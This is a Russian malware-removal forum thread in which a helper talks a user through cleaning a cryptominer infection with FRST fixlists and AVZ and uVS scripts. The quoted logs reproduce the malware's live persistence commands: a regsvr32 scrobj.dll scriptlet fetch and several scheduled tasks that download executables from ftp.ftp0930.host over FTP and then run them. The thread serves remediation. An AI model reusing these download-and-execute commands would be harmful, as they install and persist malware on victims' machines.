Помогите добить майнер :) [Trojan-Banker.Win32.Banbra.wojq, Trojan.BAT.Agent.bbf]

**sTeeL42rus** · 02.11.2018, 19:39

Доброго времени суток!
Заразил ПК каким-то майнером. Начал виснуть ПК при входе в систему, обнаружил, что из автозагрузки запускается regsvr32, который качает какой-то файл (предположительно ups.exe), далее запускается conhost.exe*32, который качает ещё других зловредов и планировщик задач забивается 4 задачами (Mysa1, Mysa2, Mysa3, ok), далее не знаю что именно грузило систему. Своими силами почистил реестр, прогнал cureit'ом и нашёл с помощью FRST, то что сидело в автозагрузке. Поэтому визуально сейчас всё ок, но смущает, что в свойствах браузера сценарий автонастройки не получается изменить. Просьба проверить, остались ли ещё какие-то проблемы. Спасибо заранее.

- - - - -Добавлено - - - - -

Вложение 674706

С прокси всё ок, это с работы.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 02.11.2018, 19:40

Уважаемый(ая) sTeeL42rus, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

SQ · 02.11.2018, 19:54

Здравствуйте,

Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

Код:

CreateRestorePoint:
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{7e8894d2-c02d-4876-9c27-a2a17145d306} <==== ATTENTION (Restriction - IP)
ProxyServer: [S-1-5-21-1781993912-345317390-3542326927-1000] => nskcossquid01.zsttk.ru:8080
BHO-x32: No Name -> {8E8F97CD-60B5-456F-A201-73065652D099} -> No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
CHR HKLM-x32\...\Chrome\Extension: [bgcifljfapbhgiehkjlckfjmgeojijcb] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ccjleegmemocfpghkhpjmiccjcacackp] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [icanjjkadceebmhanpekkofdhclnoijl] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lbjjfiihgfegniolckphpnfaokdkbmdm] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd] - hxxps://clients2.google.com/service/update2/crx
U0 Partizan; system32\drivers\Partizan.sys [X]
File: C:\Windows\update.exe
Zip: C:\Windows\update.exe;C:\Windows\system\down.exe;C:\Windows\system32\s;C:\Windows\system32\ps;C:\Windows\system32\p;C:\Windows\system32\1.txt;C:\Windows\system32\cpu.txt;C:\Program Files (x86)\erhcnwal5y.dat;C:\ProgramData\mfc7sys.dat
2018-11-01 21:48 - 2018-11-01 21:48 - 002639872 _____ C:\Windows\update.exe
Folder: C:\Windows\rescache
File: C:\Windows\system\down.exe
2018-09-13 22:55 - 2018-09-13 22:55 - 000000000 ____D C:\Users\Все пользователи\RegRun
2018-09-13 22:55 - 2018-09-13 22:55 - 000000000 ____D C:\ProgramData\RegRun
2018-09-13 22:53 - 2018-10-29 00:12 - 000000000 ____D C:\Program Files (x86)\UnHackMe
2018-09-07 19:10 - 2018-11-01 21:48 - 000000081 _____ C:\Windows\system32\s
2018-09-07 19:10 - 2018-11-01 21:48 - 000000079 _____ C:\Windows\system32\ps
2018-09-07 19:10 - 2018-11-01 21:48 - 000000077 _____ C:\Windows\system32\p
2018-09-06 20:04 - 2018-09-06 20:04 - 000002001 _____ C:\Windows\system32\cpu.txt
2018-09-06 20:03 - 2018-09-06 20:03 - 000000005 _____ C:\Windows\system32\1.txt
2018-10-27 19:56 - 2018-10-27 19:56 - 000002681 _____ C:\Windows\cpu.txt
Folder: C:\safe
2017-05-20 13:09 - 000000029 _____ () C:\ProgramData\mfc7sys.dat
2017-05-20 13:07 - 2017-05-20 13:09 - 000000029 _____ () C:\Users\Все пользователи\mfc7sys.dat
2017-12-05 05:18 - 2017-12-05 05:18 - 000000048 ____H () C:\Program Files (x86)\erhcnwal5y.dat
C:\Users\sTeeL\AppData\Local\Temp\downloader.exe
ContextMenuHandlers4-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} =>  -> No File
ContextMenuHandlers6: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} =>  -> No File
Task: {70AA880D-4FBF-415A-8206-F4413EB25965} - \Opera scheduled Autoupdate 1467266623 -> No File <==== ATTENTION
Task: {BF662E29-8A01-4B19-852F-473A6ED83B45} - \Opera scheduled Autoupdate 1467266364 -> No File <==== ATTENTION
Task: {F6730CA6-5C06-4186-8EC1-058A7E6322F3} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
MSCONFIG\Services: Ghostery Storage Server => 2
File: D:\pool\mfc7sys\mfc7sys.exe
FirewallRules: [{2079D2B6-65DA-45A6-A0FA-DDCD0B43C014}] => (Allow) C:\Program Files (x86)\UnHackMe\wu.exe
FirewallRules: [{6A489918-F6B3-49A1-83BC-BE85D0A0AEB1}] => (Allow) C:\Program Files (x86)\UnHackMe\wu.exe
FirewallRules: [{E2645527-901C-4E08-BA52-8F6754CBEF42}] => (Allow) C:\Program Files (x86)\UnHackMe\RegRunInfo.exe
FirewallRules: [{9DB5D16A-B269-49BE-A8C6-5DCAB832BF73}] => (Allow) C:\Program Files (x86)\UnHackMe\RegRunInfo.exe
Reboot:

Запустите FRST и нажмите один раз на кнопку Fix и подождите.
Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
Обратите внимание, что компьютер будет перезагружен.

На рабочем столе образуется карантин вида <date>.zip загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

**sTeeL42rus** · 03.11.2018, 07:15

До того, как прочёл Ваш комментарий, перезагрузил ПК и началось всё заново. Карантин отправил. Скрипт прогнал, не помогло, загружал его из безопасного режима. Сейчас ничего сам не отключал и не удалял. Логи AVZ прикрепил. Фикслог прикрепил. Прогнал ещё раз FRST, логи тоже прикрепил.

SQ · 03.11.2018, 09:02

Знакома ли Вам следующая настройка?

Код:

O17 - HKLM\System\CCS\Services\Tcpip\Parameters: [SearchList] = zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix
O17 - HKLM\System\ControlSet002\Services\Tcpip\Parameters: [SearchList] = zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix

HiJackThis (из каталога autologger)профиксить
Важно: необходимо отметить и профиксить только то, что указано ниже.

Код:

O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp0930.host:280/v.sct scrobj.dll
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: \Microsoft\Windows Live\SOXE\Extractor Definitions Update Task - {3519154C-227E-47F3-9CC9-12C3F05817F1} - (no file)
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa

AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

Код:

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); 
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Windows\help\lsmosee.exe','');
 QuarantineFile('c:\windows\debug\ok.dat','');
 QuarantineFile('c:\windows\update.exe','');
 QuarantineFile('c:\windows\debug\item.dat','');
 QuarantineFile('a.exe','');
 QuarantineFile('C:\Windows\debug\item.dat','');
 TerminateProcessByName('c:\windows\temp\conhost.exe');
 QuarantineFile('c:\windows\temp\conhost.exe','');
 DeleteFile('c:\windows\temp\conhost.exe','32');
 DeleteFile('C:\Windows\debug\item.dat','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start');
 DeleteFile('C:\Windows\system32\Tasks\Mysa','64');
 DeleteFile('C:\Windows\system32\Tasks\Mysa1','64');
 DeleteFile('c:\windows\debug\item.dat','32');
 DeleteFile('C:\Windows\system32\Tasks\Mysa2','64');
 DeleteFile('c:\windows\update.exe','32');
 DeleteFile('C:\Windows\system32\Tasks\Mysa3','64');
 DeleteFile('C:\Windows\system32\Tasks\ok','64');
 DeleteFile('c:\windows\debug\ok.dat','32');
 DeleteFile('C:\Windows\help\lsmosee.exe','32');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в AVZ:

Код:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.

Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

- Подготовьте лог AdwCleaner и приложите его в теме.

- - - - -Добавлено - - - - -

Уточните пожалуйста, Вам знакома следующая программа?

Код:

D:\pool\mfc7sys\mfc7sys.exe

Если да, то:

Похоже взяли утилитой FRST в карантин файл mfc7sys.dat (возможно он пренадлежит приложению mfc7sys), для восстановление из карантина файлов, выполните следующее:

Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Код:
```
CreateRestorePoint:
RestoreQuarantine: C:\FRST\Quarantine\C\ProgramData\mfc7sys.dat.xBAD
RestoreQuarantine: C:\FRST\Quarantine\C\Windows\system32\cpu.txt.xBAD
RestoreQuarantine: C:\FRST\Quarantine\C\Windows\cpu.txt.xBAD
```
Запустите FRST и нажмите один раз на кнопку Fix и подождите.
Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

**sTeeL42rus** · 03.11.2018, 10:44

Добрый день!
Заранее извиняюсь, я немного модифицировал скрипт, добавив туда ещё файлов. Карантин отправил.Вложение 674729 Вложение 674730

[QUOTE=SQ;1491217]Знакома ли Вам следующая настройка?

Код:

O17 - HKLM\System\CCS\Services\Tcpip\Parameters: [SearchList] = zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix
O17 - HKLM\System\ControlSet002\Services\Tcpip\Parameters: [SearchList] = zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix

Да, знакома, это прокси с работы.

Уточните пожалуйста, Вам знакома следующая программа?

Код:

D:\pool\mfc7sys\mfc7sys.exe

Этой программы сейчас там нет, это был кейлогер, который я ставил специально, можно не восстанавливать эти файлы.

Лог AwdCleaner прилагаю.
После запуска скрипта, ПК ребутнулся и загрузился быстро, но в процессах снова появился этот conhost запущенный из Temp.

SQ · 03.11.2018, 16:01

Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.

**sTeeL42rus** · 03.11.2018, 16:21

Скрипт надо каждый раз прогонять? Пришлось загружаться из безопасного режима, т.к. в обычном режиме всё опять висело.

SQ · 03.11.2018, 16:24

Приложите новый лог FRST из безопасного режима. Пока не загружайтесь в нормальный режим.

**sTeeL42rus** · 03.11.2018, 16:28

Сообщение от SQ

Приложите новый лог FRST из безопасного режима. Пока не загружайтесь в нормальный режим.

Готово.

SQ · 03.11.2018, 16:46

Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

Код:

CreateRestorePoint:
CloseProcesses:
File: C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_30_0_0_134_pepper.exe
2018-11-03 20:10 - 2018-11-03 20:10 - 002639872 _____ C:\Windows\update.exe
2018-11-03 13:12 - 2018-11-03 19:15 - 000003520 _____ C:\Windows\System32\Tasks\Mysa
2018-11-03 13:12 - 2018-11-03 19:15 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3
2018-11-03 13:12 - 2018-11-03 19:15 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2
2018-11-03 13:12 - 2018-11-03 19:15 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2018-11-03 13:12 - 2018-11-03 19:15 - 000003186 _____ C:\Windows\System32\Tasks\ok
2018-11-03 01:44 - 2018-11-03 20:10 - 000000081 _____ C:\Windows\system32\s
2018-11-03 01:44 - 2018-11-03 20:10 - 000000079 _____ C:\Windows\system32\ps
2018-11-03 01:44 - 2018-11-03 20:10 - 000000077 _____ C:\Windows\system32\p
2018-11-03 00:44 - 2018-11-03 12:29 - 000000084 _____ C:\Program Files\Common Files\xp.dat
2018-11-03 00:42 - 2018-11-03 19:11 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat
Folder: C:\Windows\system
2018-11-03 00:44 - 2018-11-03 12:29 - 000000084 _____ () C:\Program Files\Common Files\xp.dat
2018-11-03 00:42 - 2018-11-03 19:11 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
Folder: c:\windows\debug
c:\windows\temp\conhost.exe
Task: {2B3CC3D7-915B-4E57-AB8A-90F996BF9570} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {45C44033-3435-40EB-ACDF-8C228BAF6C0A} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {977952DE-1162-420E-8291-C0B7DD0D7E1A} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {9AEDFF16-4ADC-42AB-AB0F-21B02B2F399E} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {F75F4480-DBB0-41DF-8B88-02DC8F55E4E6} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
MSCONFIG\startupreg: start => regsvr32 /u /s /i:http://js.ftp0930.host:280/v.sct scrobj.dll

Запустите FRST и нажмите один раз на кнопку Fix и подождите.
Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

Уточните Вы ставили ранее обновления закрывающее уязвимость SMB?

**sTeeL42rus** · 03.11.2018, 17:00

Сообщение от SQ

Уточните Вы ставили ранее обновления закрывающее уязвимость SMB?

Я не ставил, после того, как подхватил троян, решил сначала накатить все обновления системы, в автоматическом режиме. Если среди них оно было, то возможно.

Загружаюсь пока в безопасном. Fixlog прикрепил. Надо ещё эту папку тереть - c:\windows\debug.

SQ · 03.11.2018, 17:01

А где лог выполнения? Папку тереть не нужно. Есть предположение, что из-за уязвимости SMB проблема возвращается, у Вас Windows Firewall включен? На сколько вижу присутсвуют правила запрещающие доступ к SMB.

**sTeeL42rus** · 03.11.2018, 17:08

Сообщение от SQ

А где лог выполнения? Папку тереть не нужно. Есть предположение, что из-за уязвимости SMB проблема возвращается, у Вас Windows Firewall включен? На сколько вижу присутсвуют правила запрещающие доступ к SMB.

Извиняюсь. Добавил. Есть речь про "Брандмауэр Windows", то да, включен, туда добавлял IP, с которого он GET'ом файлы забирает.
Вложение 674736

Могу я как-то точно определить, установлено ли обновление или попробовать, например вручную установить?

SQ · 03.11.2018, 17:22

Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

Код:

CreateRestorePoint:
2018-11-03 13:11 - 2018-11-03 19:15 - 002359296 ____A [5506F673EB568897B1DB7C06EB4E761A] () c:\windows\debug\item.dat
2018-11-03 10:28 - 2018-10-19 00:09 - 005929472 ____A [0C17491CBA1062BE447C0076EBF47896] (TODO: <公司名>) c:\windows\debug\lsmose.exe

Запустите FRST и нажмите один раз на кнопку Fix и подождите.
Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

- - - - -Добавлено - - - - -

Проверьте если вы установили обновления для Windows 7 X64:
KB4012212
KB4012215

Вы можете попробовать их установить, если ранее их устанавливали, то второй раз они не установятся.

**sTeeL42rus** · 03.11.2018, 17:29

Готово.

- - - - -Добавлено - - - - -

Сообщение от SQ

Проверьте если вы установили обновления для Windows 7 X64:
KB4012212
KB4012215

Вы можете попробовать их установить, если ранее их устанавливали, то второй раз они не установятся.

Из безопасного не получится. Попробовать сейчас из обычного загрузиться или ещё перед этим что-нибудь надо сделать?

SQ · 03.11.2018, 17:42

Пока нет, сделайте еше один лог.

Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS.

**sTeeL42rus** · 03.11.2018, 17:59

Готово.

SQ · 03.11.2018, 18:26

Выполните скрипт в uVS:

Код:

;uVS v4.0.11 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
BREG
zoo %SystemRoot%\INF\MSIEF.EXE
zoo %SystemRoot%\WEB\N.VBS
delref AEROADMINSERVICE\[SERVICE]
delref %SystemDrive%\PROGRAM FILES (X86)\COMMON FILES\MICROSOFT SHARED\DAO\DAO350.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.21.115\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.30.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.30.3\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.31.5\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.7\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.5\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.7\PSMACHINE_64.DLL
delall %SystemRoot%\INF\MSIEF.EXE
restart

Заархивируйте пожалуйста папку Zoo из каталога uVS с паролем virus и загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

P.S. По окончанию лечения вам необходимо будет сменить все пароли.

**sTeeL42rus** · 03.11.2018, 18:36

Сообщение от SQ

P.S. По окончанию лечения вам необходимо будет сменить все пароли.

Готово. Да, хорошо, поменяю.

Помогите добить майнер :) [Trojan-Banker.Win32.Banbra.wojq, Trojan.BAT.Agent.bbf] (заявка № 220761)

Опции темы